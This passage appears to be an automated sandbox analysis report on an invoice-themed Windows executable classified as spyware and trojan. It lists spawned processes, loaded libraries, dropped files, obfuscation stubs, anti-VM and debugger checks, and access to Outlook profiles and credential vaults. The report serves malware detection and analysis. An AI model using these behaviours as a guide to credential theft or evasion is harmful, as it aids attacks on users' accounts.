              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 3672B910 appears 268 times
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 36787BE4 appears 90 times
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 367AE692 appears 86 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 048BE692 appears 86 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 04885050 appears 58 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 048CEF10 appears 105 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 0483B910 appears 278 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 04897BE4 appears 102 times
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096652287.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrigitts.exe4 vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.000000003667F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.00000000369D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000364CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196435867.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrigitts.exe4 vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerasphone.exej% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.000000000657F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerasphone.exej% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/10@3/2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_004021CF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021CF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmakeJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Users\user\AppData\Local\Temp\nseB9BC.tmpJump to behavior
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeReversingLabs: Detection: 21%
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeVirustotal: Detection: 25%
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile read: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"
              Source: C:\Windows\SysWOW64\rasphone.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: militriskes.lnk.0.drLNK file: ..\..\..\..\..\..\..\Transformationsmodeller.Tri12
              Source: C:\Windows\SysWOW64\rasphone.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: wntdll.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rasphone.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rasphone.pdbGCTL source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mshtml.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp

              Data Obfuscation

              Source: Yara matchFile source: 00000000.00000002.84200771924.0000000008C45000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.84398186443.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.84200771924.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.83100054536.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.Cir, type: DROPPED
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_707E1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_707E1BFF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_707E30C0 push eax; ret 0_2_707E30EE
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367097A1 push es; iretd 2_2_367097A8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367021AD pushad ; retf 0004h2_2_3670223F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367308CD push ecx; mov dword ptr [esp], ecx2_2_367308D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643CF57 push ebx; rep ret 2_2_3643CF61
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36435496 pushad ; ret 2_2_364354A0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36445252 push eax; ret 2_2_36445254
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36436B87 push ebx; iretd 2_2_36436B9F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36441BA1 pushad ; ret 2_2_36441BA4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643C86F push eax; ret 2_2_3643C870
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643D01B push ebx; rep ret 2_2_3643CF61
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E886F push eax; ret 3_2_006E8870
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E901B push ebx; rep ret 3_2_006E8F61
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E1496 pushad ; ret 3_2_006E14A0
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006F1252 push eax; ret 3_2_006F1254
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E1E18 pushad ; retf 3_2_006E1E19
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E1758 pushfd ; retf 3_2_006E1890
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E8F57 push ebx; rep ret 3_2_006E8F61
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006EDBA1 pushad ; ret 3_2_006EDBA4
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E2B87 push ebx; iretd 3_2_006E2B9F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04918801 pushad ; retf 3_2_04918802
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04927C3B push eax; ret 3_2_04927C3D
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0492458A pushad ; ret 3_2_0492458D
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0491F940 push ebx; rep ret 3_2_0491F94A
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04919570 push ebx; iretd 3_2_04919588
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0491FA04 push ebx; rep ret 3_2_0491F94A
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0491F258 push eax; ret 3_2_0491F259
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04917E7F pushad ; ret 3_2_04917E89
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048408CD push ecx; mov dword ptr [esp], ecx4_2_048408D6
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C15496 pushad ; ret 4_2_04C154A0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1D01B push ebx; rep ret 4_2_04C1CF61
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dllJump to dropped file
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 8ECAE36
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 567AE36
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B90594
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B8FF74
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D6C4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D864
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D004
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D144
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B90594
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D764
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D324
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D364
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D004
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8FF74
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D6C4
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D864
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D604
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36771763 rdtsc 2_2_36771763
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dllJump to dropped file
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI coverage: 0.4 %
              Source: C:\Windows\SysWOW64\rasphone.exeAPI coverage: 1.2 %
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1076Thread sleep count: 69 > 30Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 1076Thread sleep time: -345000s >= -30000sJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84315348037.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84315348037.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: RAVCpl64.exe, 00000003.00000002.88172888199.000000000068C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI call chain: ExitProcess graph end nodegraph_0-4955
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI call chain: ExitProcess graph end nodegraph_0-4960
              Source: C:\Windows\SysWOW64\rasphone.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess queried: DebugPortJump to behavior
